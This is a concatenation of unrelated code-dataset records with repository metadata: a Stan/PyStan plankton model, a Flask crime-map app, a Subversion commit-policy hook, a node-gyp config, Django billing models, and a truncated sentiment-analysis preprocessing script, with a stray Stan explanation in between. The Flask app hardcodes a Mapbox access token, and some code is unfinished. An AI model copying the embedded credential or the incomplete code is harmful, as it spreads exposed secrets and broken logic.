mix1 ~ normal(0.01, 0.03); // (regular)
mix2 ~ normal(0.19, 0.02); // (winter)
for (iyear in 1:nyears){
wintermixstart[iyear] ~ normal(wintermixstart_guess[iyear], 10.0);
wintermixduration[iyear] ~ normal(wintermixduration_guess[iyear], 10.0);
}
// fitting the observations
for(i in 1:nobsvar){
for (iobs in 1:nobs){
obs_normalized = (obs[iobs,i]-x[iobs,iobsvar[i]])/sigma[i];
obs_normalized ~ std_normal();
}
}
}
'''
# In[11]:
# stitch together the updated code and compile it
stan_code = stan_code_functions + stan_code_dataparams + stan_code_model
model = pystan.StanModel(model_code=stan_code, model_name='NPZ')
# In[12]:
mcmc = model.sampling(data=stan_data, iter=2000)
print(mcmc)
# In[13]:
q = (5,25,50,75,95)
x_perc = np.percentile(mcmc['x'], q, axis=0)
fig, axs = plt.subplots(nrows=4, sharex=True, sharey=True, figsize=(12,12))
for iax,ax in enumerate(axs.flat[:-1]):
ax.plot(t, data[index,iax+1])
ax.fill_between(t, x_perc[0,:,iax], x_perc[-1,:,iax], alpha=0.2, color='C1')
ax.fill_between(t, x_perc[1,:,iax], x_perc[-2,:,iax], alpha=0.5, color='C1')
ax.plot(t, x_perc[2,:,iax], label='model', color='C1')
ax.set_ylabel(data_names[iax+1])
ax.grid(True)
axs[0].set_title('Narragansett Bay NPZ data and model posterior quantiles')
ax = axs[-1]
ax.plot(t, np.sum(data[index,1:],axis=1))
ax.fill_between(t, np.sum(x_perc[0,:,:],axis=1), np.sum(x_perc[-1,:,:],axis=1), alpha=0.2, color='C1')
ax.fill_between(t, np.sum(x_perc[1,:,:],axis=1), np.sum(x_perc[-2,:,:],axis=1), alpha=0.5, color='C1')
ax.plot(t, np.sum(x_perc[2,:,:],axis=1), label='model', color='C1')
ax.set(xlabel=data_names[0], ylabel='sum', xticks=np.arange(0.0,nyears*365.0,365.0))
ax.grid(True)
|
[
"gregleebritten@gmail.com"
] |
gregleebritten@gmail.com
|
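The reparameterization discussed in the notebook above can look purely cosmetic: obs ~ normal(x, sigma) versus obs_normalized ~ std_normal(). Mathematically the two densities differ only by a Jacobian factor of 1/sigma, but handing the sampler a standardized quantity is what eases exploration. A tiny NumPy/SciPy sketch (outside Stan, scalar values assumed) of that relationship:

import numpy as np
from scipy.stats import norm

obs, x, sigma = 0.42, 0.35, 0.1

# direct parameterization: log N(obs | x, sigma)
lp_direct = norm.logpdf(obs, loc=x, scale=sigma)

# normalized parameterization: log N((obs - x) / sigma | 0, 1) plus the
# Jacobian term -log(sigma); the term is constant in x but does depend on
# sigma, so it matters for sigma's posterior when sigma is being estimated
lp_normalized = norm.logpdf((obs - x) / sigma) - np.log(sigma)

print(np.isclose(lp_direct, lp_normalized))  # True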
18b12259ea05cacdcb9d10fcdd104daa667751b6
|
4b59ace76840cbeb28f0fac19f128cd3959a7c3a
|
/catalog/api/v1/utility.py
|
4b15a94bb676733ffce5e82f091fc6cde3d1ce2c
|
[] |
no_license
|
JoshuadeJong/ecommerce-microservice
|
2a8f4d2f091c459dc9bcb47c01904f21c478cf91
|
246c6d0eb014df2946874cafcddebea1e0eaa97d
|
refs/heads/master
| 2023-03-25T23:57:15.369285
| 2021-03-19T15:47:32
| 2021-03-19T15:47:32
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 204
|
py
|
def item2dict(item_id, item) -> dict:
return {
"id": item_id,
"name": item.name,
"description": item.description,
"price": item.price,
"stock": item.stock
}
|
[
"joshuakdejong@gmail.com"
] |
joshuakdejong@gmail.com
|
f6e865c5110f9052fdbb39331313e2ca555771da
|
9e1f6ccb24740e5dc51c71b76ffc3df4f561453e
|
/app.py
|
4451f01d8c4e516275d05abca23045fda760067c
|
[] |
no_license
|
AbbieKent/Analyzing-Atlanta-Crime
|
2ed7ed191b757482c1d3f42fb96da53a921b09ee
|
872ecb801b1abec1f41dd732ee9d6f88d70f6072
|
refs/heads/main
| 2023-03-17T17:44:25.125117
| 2021-03-15T21:11:42
| 2021-03-15T21:11:42
| 348,123,489
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,506
|
py
|
from flask import Flask, render_template
from flask import request, url_for, render_template, redirect
import pandas as pd
import numpy as np
import pdb, os
from os import environ
import joblib
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import OneHotEncoder
from sklearn.compose import ColumnTransformer
from sklearn.preprocessing import LabelEncoder
from platform import python_version
print(python_version())
# Create an instance of our Flask app.
app = Flask(__name__)
# Set route
@app.route('/')
def index():
print('STARTING! '*20)
mapbox_access_token = "pk.eyJ1IjoiZGF2aWRjb3kiLCJhIjoiY2tqcHU1YzBzOHY4ZjJxcWpkNGI5b2h2MSJ9.CsPttIW0Q41kP2uOBN6n8g"
# pdb.set_trace()
print(os.getcwd())
# df = pd.read_csv('./static/data/data.csv')
df = pd.read_csv('./static/data/data.csv')
#df = df.head(5)
return render_template('index.html', tables = [df.to_html(classes='female')],
titles=['IDKLOL'],
mapbox_access_token=mapbox_access_token)
@app.route('/neighborhood')
def neighborhood():
return render_template('neighborhood.html')
@app.route('/typesofcrimes')
def crime():
return render_template('crime.html')
@app.route('/timeofyear')
def year():
return render_template('Timeofyear.html')
@app.route('/contactinfo')
def contact():
return render_template('contactinfo.html')
@app.route('/index')
def homepage():
return render_template('index.html')
if __name__ == "__main__":
app.run(debug=True)
|
[
"arkent10@gmail.com"
] |
arkent10@gmail.com
|
940dfcffd7da2f2431e4e7d093e93c7a44d5ca3b
|
9699ff2d4f407746c80c507f158da02f5ab9596a
|
/subversion/contrib/hook-scripts/enforcer/.svn/text-base/enforcer.svn-base
|
caacf749ddd37057e18c2fd432789b0043a5914f
|
[
"BSD-3-Clause",
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference",
"X11"
] |
permissive
|
AsherBond/MondocosmOS-Dependencies
|
7af67e41ae60b578800fc4184fa69a6b44da1715
|
bfd2554e6c2cfc4bc1ecb2b653594ca9f0448392
|
refs/heads/master
| 2021-01-23T13:53:07.122515
| 2011-10-03T13:22:43
| 2011-10-03T13:22:43
| 2,504,513
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 17,260
|
#!/usr/bin/python
# -*- coding:utf-8;mode:python;mode:font-lock -*-
##
# Utility for Subversion commit hook scripts
# This script enforces certain coding guidelines
##
# Copyright (c) 2005 Wilfredo Sanchez Vega <wsanchez@wsanchez.net>.
# All rights reserved.
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHORS DISCLAIM ALL
# WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE
# AUTHORS BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL
# DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR
# PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER
# TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
# PERFORMANCE OF THIS SOFTWARE.
##
import sys
import os
import getopt
import popen2
#
# FIXME: Should probably retool this using python bindings, not svnlook
#
__doc__ = '''
Enforcer is a utility which can be used in a Subversion pre-commit
hook script to enforce various requirements which a repository
administrator would like to impose on data coming into the repository.
A couple of example scenarios:
- In a Java project I work on, we use log4j extensively. Use of
System.out.println() bypasses the control that we get from log4j,
so we would like to discourage the addition of println calls in our
code.
We want to deny any commits that add a println into the code. The
world being full of exceptions, we do need a way to allow some uses
of println, so we will allow it if the line of code that calls
println ends in a comment that says it is ok:
System.out.println("No log4j here"); // (authorized)
We also do not (presently) want to refuse a commit to a file which
already has a println in it. There are too many already in the
code and a given developer may not have time to fix them up before
commiting an unrelated change to a file.
- The above project uses WebObjects, and you can enable debugging in
a WebObjects component by turning on the WODebug flag in the
component WOD file. That is great for debugging, but massively
bloats the log files when the application is deployed.
We want to disable any commit of a file enabling WODebug,
regardless of whether the committer made the change or not; these
have to be cleaned up before any successful commit.
What this script does is it uses svnlook to peek into the transaction
in progress. As it sifts through the transaction, it calls out to a
set of hooks which allow the repository administrator to examine what
is going on and decide whether it is acceptable. Hooks may be written
(in Python) into a configuration file. If the hook raises an
exception, enforcer will exit with an error status (and presumably the
commit will be denied by the pre-commit hook). The following hooks are
available:
verify_file_added(filename)
- called when a file is added.
verify_file_removed(filename)
- called when a file is removed.
verify_file_copied(destination_filename, source_filename)
- called when a file is copied.
verify_file_modified(filename)
- called when a file is modified.
verify_line_added(filename, line)
- called for each line that is added to a file.
(verify_file_modified() will have been called on the file
beforehand)
verify_line_removed(filename, line)
- called for each line that is removed from a file.
(verify_file_modified() will have been called on the file
beforehand)
verify_property_line_added(filename, property, line)
- called for each line that is added to a property on a file.
verify_property_line_removed(filename, property, line)
- called for each line that is removed from a property on a file.
In addition, these functions are available to be called from within a
hook routine:
open_file(filename)
- Returns an open file-like object from which the data of the given
file (as available in the transaction being processed) can be
read.
In our example scenarios, we can deny the addition of println calls by
hooking into verify_line_added(): if the file is a Java file, and the
added line calls println, raise an exception.
Similarly, we can deny the commit of any WOD file enabling WODebug by
hooking into verify_file_modified(): open the file using open_file(),
then raise if WODebug is enabled anywhere in the file.
Note that verify_file_modified() is called once per modified file,
whereas verify_line_added() and verify_line_removed() may each be
called zero or many times for each modified file, depending on the
change. This makes verify_file_modified() appropriate for checking
the entire file and the other two appropriate for checking specific
changes to files.
These example scenarios are implemented in the provided example
configuration file "enforcer.conf".
When writing hooks, it is usually easier to test the hooks on committed
transactions already in the repository, rather than installing the
hook and making commits to test them. Enforcer allows you to
specify either a transaction ID (for use in a hook script) or a
revision number (for testing). You can then, for example, find a
revision that you would like to have blocked (or not) and test your
hooks against that revision.
'''
__author__ = "Wilfredo Sanchez Vega <wsanchez@wsanchez.net>"
##
# Handle command line
##
program = os.path.split(sys.argv[0])[1]
debug = 0
transaction = None
revision = None
def usage(e=None):
if e:
print e
print ""
print "usage: %s [options] repository config" % program
print "options:"
print "\t-d, --debug Print debugging output; use twice for more"
print "\t-r, --revision rev Specify revision to check"
print "\t-t, --transaction txn Specify transaction to check"
print "Exactly one of --revision or --transaction is required"
sys.exit(1)
# Read options
try:
(optargs, args) = getopt.getopt(sys.argv[1:], "dt:r:", ["debug", "transaction=", "revision="])
except getopt.GetoptError, e:
usage(e)
for optarg in optargs:
(opt, arg) = optarg
if opt in ("-d", "--debug" ): debug += 1
elif opt in ("-t", "--transaction"): transaction = arg
elif opt in ("-r", "--revision" ): revision = arg
if transaction and revision:
usage("Cannot specify both transaction and revision to check")
if not transaction and not revision:
usage("Must specify transaction or revision to check")
if not len(args): usage("No repository")
repository = args.pop(0)
if not len(args): usage("No config")
configuration_filename = args.pop(0)
if len(args): usage("Too many arguments")
##
# Validation
# All rule enforcement goes in these routines
##
def open_file(filename):
"""
Retrieves the contents of the given file.
"""
cat_cmd = [ "svnlook", "cat", None, repository, filename ]
if transaction: cat_cmd[2] = "--transaction=" + transaction
elif revision: cat_cmd[2] = "--revision=" + revision
else: raise ValueError("No transaction or revision")
cat_out, cat_in = popen2.popen2(cat_cmd)
cat_in.close()
return cat_out
def verify_file_added(filename):
"""
Here we verify file additions which may not meet our requirements.
"""
if debug: print "Added file %r" % filename
if configuration.has_key("verify_file_added"):
configuration["verify_file_added"](filename)
def verify_file_removed(filename):
"""
Here we verify file removals which may not meet our requirements.
"""
if debug: print "Removed file %r" % filename
if configuration.has_key("verify_file_removed"):
configuration["verify_file_removed"](filename)
def verify_file_copied(destination_filename, source_filename):
"""
Here we verify file copies which may not meet our requirements.
"""
if debug: print "Copied %r to %r" % (source_filename, destination_filename)
if configuration.has_key("verify_file_copied"):
configuration["verify_file_copied"](destination_filename, source_filename)
def verify_file_modified(filename):
"""
Here we verify files which may not meet our requirements.
Any failure, even if not due to the specific changes in the commit
will raise an error.
"""
if debug: print "Modified file %r" % filename
if configuration.has_key("verify_file_modified"):
configuration["verify_file_modified"](filename)
def verify_line_added(filename, line):
"""
Here we verify new lines of code which may not meet our requirements.
Code not changed as part of this commit is not verified.
"""
if configuration.has_key("verify_line_added"):
configuration["verify_line_added"](filename, line)
def verify_line_removed(filename, line):
"""
Here we verify removed lines of code which may not meet our requirements.
Code not changed as part of this commit is not verified.
"""
if configuration.has_key("verify_line_removed"):
configuration["verify_line_removed"](filename, line)
def verify_property_line_added(filename, property, line):
"""
Here we verify added property lines which may not meet our requirements.
Code not changed as part of this commit is not verified.
"""
if debug: print "Add %s::%s: %s" % (filename, property, line)
if configuration.has_key("verify_property_line_added"):
configuration["verify_property_line_added"](filename, property, line)
def verify_property_line_removed(filename, property, line):
"""
Here we verify removed property lines which may not meet our requirements.
Code not changed as part of this commit is not verified.
"""
if debug: print "Del %s::%s: %s" % (filename, property, line)
if configuration.has_key("verify_property_line_removed"):
configuration["verify_property_line_removed"](filename, property, line)
##
# Do the Right Thing
##
configuration = {"open_file": open_file}
execfile(configuration_filename, configuration, configuration)
diff_cmd = [ "svnlook", "diff", None, repository ]
if transaction: diff_cmd[2] = "--transaction=" + transaction
elif revision: diff_cmd[2] = "--revision=" + revision
else: raise ValueError("No transaction or revision")
diff_out, diff_in = popen2.popen2(diff_cmd)
diff_in.close()
try:
state = 0
#
# This is the svnlook output parser
#
for line in diff_out:
if line[-1] == "\n": line = line[:-1] # Zap trailing newline
# Test cases:
# r2266: Added text files, property changes
# r18923: Added, deleted, modified text files
# r25692: Copied files
# r7758: Added binary files
if debug > 1: print "%4d: %s" % (state, line) # Useful for testing parser problems
if state is -1: # Used for testing new states: print whatever is left
print line
continue
if state in (0, 100, 300): # Initial state or in a state that may return to initial state
if state is 0 and not line: continue
colon = line.find(":")
if state is not 300 and colon != -1 and len(line) > colon + 2:
action = line[:colon]
filename = line[colon+2:]
if action in (
"Modified",
"Added", "Deleted", "Copied",
"Property changes on",
):
if action == "Modified": verify_file_modified(filename)
elif action == "Added" : verify_file_added (filename)
elif action == "Deleted" : verify_file_removed (filename)
elif action == "Copied":
i = filename.find(" (from rev ")
destination_filename = filename[:i]
filename = filename[i:]
i = filename.find(", ")
assert filename[-1] == ")"
source_filename = filename[i+2:-1]
verify_file_copied(destination_filename, source_filename)
filename = destination_filename
if action == "Modified" : state = 10
elif action == "Added" : state = 10
elif action == "Deleted" : state = 10
elif action == "Copied" : state = 20
elif action == "Property changes on": state = 30
else: raise AssertionError("Unknown action")
current_filename = filename
current_property = None
continue
assert state in (100, 300)
if state is 10: # Expecting a bar (follows "(Added|Modified|Deleted):" line)
assert line == "=" * 67
state = 11
continue
if state is 11: # Expecting left file info (follows bar)
if line == "": state = 0
elif line == "(Binary files differ)": state = 0
elif line.startswith("--- "): state = 12
else: raise AssertionError("Expected left file info, got: %r" % line)
continue
if state is 12: # Expecting right file info (follows left file info)
assert line.startswith("+++ " + current_filename)
state = 100
continue
if state is 20: # Expecting a bar or blank (follows "Copied:" line)
# Test cases:
# r25692: Copied and not modified (blank)
# r26613: Copied and modified (bar)
if not line:
state = 0
elif line == "=" * 67:
state = 11
else:
raise AssertionError("After Copied: line, neither bar nor blank: %r" % line)
continue
if state is 100: # Expecting diff data
for c, verify in (("-", verify_line_removed), ("+", verify_line_added)):
if len(line) >= 1 and line[0] == c:
try: verify(current_filename, line[1:])
except Exception, e:
sys.stderr.write(str(e))
sys.stderr.write("\n")
sys.exit(1)
break
else:
if (
not line or
(len(line) >= 4 and line[:2] == "@@" == line[-2:]) or
(len(line) >= 1 and line[0] == " ") or
line == "\\ No newline at end of file"
):
continue
raise AssertionError("Expected diff data, got: %r" % line)
continue
if state is 30: # Expecting a bar (follows "Property changes on:" line)
assert line == "_" * 67
state = 31
continue
if state is 31: # Expecting property name (follows bar)
for label in (
"Name", # svn versions < 1.5
"Added", "Modified", "Deleted" # svn versions >= 1.5
):
if line.startswith(label + ": "):
break
else:
raise AssertionError("Unexpected property name line: %r" % line)
state = 300
# Fall through to state 300
if state is 300:
if not line:
state = 0
continue
for label in (
"Name", # svn versions < 1.5
"Added", "Modified", "Deleted" # svn versions >= 1.5
):
if line.startswith(label + ": "):
current_property = line[len(label)+2:]
current_verify_property_function = None
break
else:
for prefix, verify in (
(" - ", verify_property_line_removed),
(" + ", verify_property_line_added)
):
if line.startswith(prefix):
try: verify(current_filename, current_property, line[5:])
except Exception, e:
sys.stderr.write(str(e))
sys.stderr.write("\n")
sys.exit(1)
current_verify_property_function = verify
break
else:
if not line: continue
if current_verify_property_function is None:
raise AssertionError("Expected property diff data, got: %r" % line)
else:
# Multi-line property value
current_verify_property_function(current_filename, current_property, line)
continue
raise AssertionError("Unparsed line: %r" % line)
if debug: print "Commit is OK"
finally:
for line in diff_out: pass
diff_out.close()
|
[
"asherbond@asherbond.com"
] |
asherbond@asherbond.com
|
|
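The enforcer docstring above describes two example scenarios (reject newly added System.out.println calls unless the line ends in "// (authorized)", and reject any WOD file that enables WODebug) and says they are implemented in the shipped enforcer.conf, which is not part of this record. A plausible sketch of such a configuration, written against the hook names and the open_file() helper the script documents; it is an illustration, not the actual distributed file:

# enforcer.conf sketch -- executed by enforcer via execfile(), so plain Python;
# open_file() is injected into this namespace by enforcer itself.

def verify_line_added(filename, line):
    # Deny newly added println calls in Java sources unless explicitly authorized.
    if filename.endswith(".java") and "System.out.println" in line:
        if not line.rstrip().endswith("// (authorized)"):
            raise ValueError("%s: do not add System.out.println; use log4j" % filename)

def verify_file_modified(filename):
    # Deny any commit of a WOD file that enables WODebug, whether or not
    # the committer touched that particular line.
    if filename.endswith(".wod"):
        for line in open_file(filename):
            if "WODebug" in line and "true" in line.lower():
                raise ValueError("%s: WODebug must not be enabled" % filename)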
f37490ad07011a1845fa6775b2a3edffd1ff59fc
|
5141c8756e790847866c19d63744bd7c8033a51c
|
/docs/libs/reveal.js/3.7.0/plugin/multiplex/node_modules/bufferutil/build/config.gypi
|
508a69af90f898303ce883dba2be1aa581eebd58
|
[
"MIT"
] |
permissive
|
al341801/EI1036_42
|
db6fceb4fdb9272b28f34c16ee520ce072c5810b
|
d1d2c1b86a134fc4c45ba4146002589f7bee27f3
|
refs/heads/master
| 2020-09-15T13:02:09.056697
| 2019-11-22T15:05:53
| 2019-11-22T15:05:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,286
|
gypi
|
# Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"asan": 0,
"coverage": "false",
"debug_devtools": "node",
"debug_http2": "false",
"debug_nghttp2": "false",
"force_dynamic_crt": 0,
"host_arch": "x64",
"icu_data_file": "icudt60l.dat",
"icu_data_in": "../../deps/icu-small/source/data/in/icudt60l.dat",
"icu_endianness": "l",
"icu_gyp_path": "tools/icu/icu-generic.gyp",
"icu_locales": "en,root",
"icu_path": "deps/icu-small",
"icu_small": "true",
"icu_ver_major": "60",
"llvm_version": 0,
"node_byteorder": "little",
"node_enable_d8": "false",
"node_enable_v8_vtunejit": "false",
"node_install_npm": "true",
"node_module_version": 59,
"node_no_browser_globals": "false",
"node_prefix": "/",
"node_release_urlbase": "https://nodejs.org/download/release/",
"node_shared": "false",
"node_shared_cares": "false",
"node_shared_http_parser": "false",
"node_shared_libuv": "false",
"node_shared_nghttp2": "false",
"node_shared_openssl": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_use_bundled_v8": "true",
"node_use_dtrace": "true",
"node_use_etw": "false",
"node_use_lttng": "false",
"node_use_openssl": "true",
"node_use_perfctr": "false",
"node_use_v8_platform": "true",
"node_without_node_options": "false",
"openssl_fips": "",
"openssl_no_asm": 0,
"shlib_suffix": "59.dylib",
"target_arch": "x64",
"uv_parent_path": "/deps/uv/",
"uv_use_dtrace": "true",
"v8_enable_gdbjit": 0,
"v8_enable_i18n_support": 1,
"v8_enable_inspector": 1,
"v8_no_strict_aliasing": 1,
"v8_optimized_debug": 0,
"v8_promise_internal_field_count": 1,
"v8_random_seed": 0,
"v8_trace_maps": 0,
"v8_use_snapshot": "true",
"want_separate_host_toolset": 0,
"xcode_version": "7.0",
"nodedir": "/Users/dllido/.node-gyp/9.3.0",
"standalone_static_library": 1,
"dry_run": "",
"legacy_bundling": "",
"save_dev": "",
"browser": "",
"commit_hooks": "true",
"only": "",
"viewer": "man",
"also": "",
"rollback": "true",
"sign_git_commit": "",
"audit": "true",
"usage": "",
"globalignorefile": "/usr/local/etc/npmignore",
"init_author_url": "",
"maxsockets": "50",
"shell": "/bin/bash",
"metrics_registry": "https://registry.npmjs.org/",
"parseable": "",
"shrinkwrap": "true",
"init_license": "ISC",
"timing": "",
"if_present": "",
"cache_max": "Infinity",
"init_author_email": "",
"sign_git_tag": "",
"cert": "",
"git_tag_version": "true",
"local_address": "",
"long": "",
"preid": "",
"fetch_retries": "2",
"noproxy": "",
"registry": "https://registry.npmjs.org/",
"key": "",
"message": "%s",
"versions": "",
"globalconfig": "/usr/local/etc/npmrc",
"always_auth": "",
"logs_max": "10",
"prefer_online": "",
"cache_lock_retries": "10",
"global_style": "",
"update_notifier": "true",
"audit_level": "low",
"heading": "npm",
"fetch_retry_mintimeout": "10000",
"offline": "",
"read_only": "",
"searchlimit": "20",
"access": "",
"json": "",
"allow_same_version": "",
"description": "true",
"engine_strict": "",
"https_proxy": "",
"init_module": "/Users/dllido/.npm-init.js",
"userconfig": "/Users/dllido/.npmrc",
"cidr": "",
"node_version": "9.3.0",
"user": "",
"auth_type": "legacy",
"editor": "vi",
"ignore_prepublish": "",
"save": "true",
"script_shell": "",
"tag": "latest",
"global": "",
"progress": "true",
"ham_it_up": "",
"optional": "true",
"searchstaleness": "900",
"bin_links": "true",
"force": "",
"save_prod": "",
"searchopts": "",
"depth": "Infinity",
"node_gyp": "/usr/local/lib/node_modules/npm/node_modules/node-gyp/bin/node-gyp.js",
"rebuild_bundle": "true",
"sso_poll_frequency": "500",
"unicode": "true",
"fetch_retry_maxtimeout": "60000",
"ca": "",
"save_prefix": "^",
"scripts_prepend_node_path": "warn-only",
"sso_type": "oauth",
"strict_ssl": "true",
"tag_version_prefix": "v",
"dev": "",
"fetch_retry_factor": "10",
"group": "20",
"save_exact": "",
"cache_lock_stale": "60000",
"prefer_offline": "",
"version": "",
"cache_min": "10",
"otp": "",
"cache": "/Users/dllido/.npm",
"searchexclude": "",
"color": "true",
"package_lock": "true",
"package_lock_only": "",
"save_optional": "",
"user_agent": "npm/6.7.0 node/v9.3.0 darwin x64",
"ignore_scripts": "",
"cache_lock_wait": "10000",
"production": "",
"save_bundle": "",
"send_metrics": "",
"init_version": "1.0.0",
"node_options": "",
"umask": "0022",
"scope": "",
"git": "git",
"init_author_name": "",
"onload_script": "",
"tmp": "/var/folders/pb/2r7f4bq147bgw8b7s_x_s3900000gn/T",
"unsafe_perm": "true",
"prefix": "/usr/local",
"link": ""
}
}
|
[
"dllido@MacBook-Pro-de-Dolores.local"
] |
dllido@MacBook-Pro-de-Dolores.local
|
653e1569defce82bd7cefae6b2b508f8851295a1
|
af4b590504660a302f53a6fd99a5cb2e1244b85f
|
/src/billing/models.py
|
d6325f0ceba818542cbc794137a9674a6eddcd9c
|
[] |
no_license
|
qkhan/NewEcommerce
|
3216da9e80567f9c548efcac0dd00ee754399848
|
12f40adf071471bdc30d76e07bc563949c5f5d19
|
refs/heads/master
| 2020-03-09T22:59:24.568434
| 2018-04-11T06:52:10
| 2018-04-11T06:52:10
| 129,048,139
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,701
|
py
|
from django.conf import settings
from django.db import models
from accounts.models import GuestEmail
from django.db.models.signals import pre_save, post_save
User = settings.AUTH_USER_MODEL
class BillingProfileManager(models.Manager):
def new_or_get(self, request):
user = request.user
guest_email_id = request.session.get('guest_email_id')
print("Guest email id: ", guest_email_id)
created = False
obj = None
if user.is_authenticated():
            # logged-in user checkout; remember payment details
obj, created = self.model.objects.get_or_create(user=user, email=user.email)
#print("Billing Profile:", billing_profile, " | ", billing_profile_created)
elif guest_email_id is not None:
            # guest user checkout; auto-reloads payment details
guest_email_obj = GuestEmail.objects.get(id=guest_email_id)
obj, created = self.model.objects.get_or_create(email=guest_email_obj.email)
else:
pass
return obj, created
# Create your models here.
class BillingProfile(models.Model):
user = models.OneToOneField(User, null=True, blank=True)
email = models.EmailField()
active = models.BooleanField(default=True)
update = models.DateTimeField(auto_now=True)
timestamp = models.DateTimeField(auto_now_add=True)
objects = BillingProfileManager()
def __str__(self):
return self.email
def user_created_receiver(sender, instance, created, *args, **kwargs):
if created and instance.email:
BillingProfile.objects.get_or_create(user=instance, email=instance.email)
post_save.connect(user_created_receiver, sender=User)
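# --- usage sketch (assumption; not part of the original app) ---
# a checkout view would typically resolve the profile with:
#     billing_profile, created = BillingProfile.objects.new_or_get(request)
# where `request` carries either an authenticated user or a 'guest_email_id'
# session key; otherwise new_or_get returns (None, False).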
|
[
"qaisarkhan@Qaisars-iMac.local"
] |
qaisarkhan@Qaisars-iMac.local
|
e7402159b694a4820f2b00e2af214a79f9043612
|
e965225b5b16feb3a8264980cdeff83342e1167c
|
/pythontask.py
|
a4b01f83681283f4550677aedce2dd6b39d9b2de
|
[] |
no_license
|
challapavankumar/Archeville-Super-Archy-Tournament-task
|
7b8631fe448f04f9ed335327e1a2457c3bc8e5cf
|
d646a830865f5607193ca883a217974fb4e5a641
|
refs/heads/main
| 2023-01-31T15:03:21.658700
| 2020-12-18T06:11:14
| 2020-12-18T06:11:14
| 322,502,956
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,858
|
py
|
rounds = int(input("No of rounds to play "))
scores={"A":50,"B":4,"C":3,"D":2,"E":1,"F":0}
bonuscheck=[]
bonusplayer=[]
teams={"Gyrhuna":[{"Jaons Diak":0},{"Susu":0}],
"Achni":[{"Milog":0},{"Tianlong":0}],
"Bathar":[{"Pakhangba":0},{"Poubi Lai Paphal":0}]}
teamno=len(teams)
bonusteam={}
teamscore={}
def WhoWonTheMatch(teamscore):
return [key for (key, value) in teamscore.items() if value == max(teamscore.values())]
for team in teams:
bonusteam[team]=0
teamscore[team]=0
players=0
for i in teams:
players+=len(teams[i])
playerscores={}
for r in range(rounds):
for team in teams:
bonuscheck=[]
bonusplayer=[]
teamscore[team]=0
for pl in teams[team]:
key, value = list(pl.items())[0]
temp=0
playerscore=(input("Enter the score of " +str(key)+str(" from team ")+team+" "))
if playerscore not in (["A","B","C","D","E","F"]):
print("Please select the score from A-F")
exit(0)
bonuscheck.append(playerscore)
bonusplayer.append(key)
prefix=key
if prefix not in playerscores:
playerscores[prefix]=scores[playerscore]
else:
playerscores[prefix]+=scores[playerscore]
temp=playerscores[prefix]
teamscore[team]+=playerscores[prefix]
if(len(set(bonuscheck))==1):
bonusteam[team]+=2
teamscore[team]+=bonusteam[team]
scores={key:value+1 if(key!="F") else value for key,value in(scores.items()) }
print(playerscores)
print(bonusteam)
print(teamscore)
print("Next Round")
key=WhoWonTheMatch(teamscore)[0]
print("Game over. {} won!!!".format(key))
|
[
"noreply@github.com"
] |
challapavankumar.noreply@github.com
|
75d75f75c5dfebdcd52ba31013c836708232536a
|
6e68d7f4bbd2cf2ecad7cdf6bbd07d6687f2685c
|
/preprocessing.py
|
a406884f0db4f90c620feac07d8ce7282e1b221b
|
[] |
no_license
|
AbhinavJindl/sentiment_analysis
|
bd5a08345913d92cd5be0e61fe5095e196fb9d49
|
b2154a89f3c0bfa89318e8d280734ed25af1cc5f
|
refs/heads/master
| 2020-03-27T20:41:28.945916
| 2018-09-02T13:55:07
| 2018-09-02T13:55:07
| 147,086,857
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,108
|
py
|
import random
import pickle
no_words = 5000
no_reviews = 1000
no_validation=1000
no_test=1000
forest_trees=50
forest_tree_features=2000
def add_noice(review_list_pos,review_list_neg,p):
    # draw p percent of each class at random as noise candidates (sketch of the apparent intent)
    n=int((p/100)*(len(review_list_pos)+len(review_list_neg))/2)
    return random.sample(review_list_pos,n),random.sample(review_list_neg,n)
def load(filename):
file = open(filename,'rb')
obj=pickle.load(file)
file.close()
return obj
def save(obj,filename):
file=open(filename,'wb')
pickle.dump(obj,file)
file.close()
#returns a dictionary for a review given string
def list_review(s,indexlist):
dic = {}
tokens=s.split(" ")
dic['sentiment']=int(tokens[0])
dic['list']=[]
for i in range(1,len(tokens)):
t=tokens[i].split(":")
if int(t[0]) in indexlist:
dic['list'].append(int(t[0]))
return dic
def preprocess():
wordsfile = open('aclImdb_v1/aclImdb/imdb.vocab','r',encoding='utf-8')
valuefile = open('aclImdb_v1/aclImdb/imdbEr.txt','r',encoding='utf-8')
count=0
words_i=[]
for line in valuefile:
linetoken=line.split('\n')
current=(count, float(linetoken[0]))
words_i.append(current)
count=count+1
words_i= sorted(words_i,key=lambda x: x[1])
indexlist=[]
for i in range(int(no_words/2)):
indexlist.append(words_i[i][0])
        indexlist.append(words_i[-(i+1)][0])  # -(i+1): most positive words, without repeating index 0
indexlist= sorted(indexlist)
forest_index_lists=[]
for i in range(forest_trees):
forest_index_lists.append(random.sample(indexlist,forest_tree_features))
reviewsfile = open('aclImdb_v1/aclImdb/train/labeledBow.feat','r',encoding='utf-8')
full_review_list = reviewsfile.readlines();
random_list_pos = random.sample(range(0,int(len(full_review_list)/2)),int(no_reviews/2))
random_list_neg = random.sample(range(int(len(full_review_list)/2),len(full_review_list)),int(no_reviews/2))
review_list={}
for i in random_list_pos:
review_list[i]=list_review(full_review_list[i],indexlist)
for i in random_list_neg:
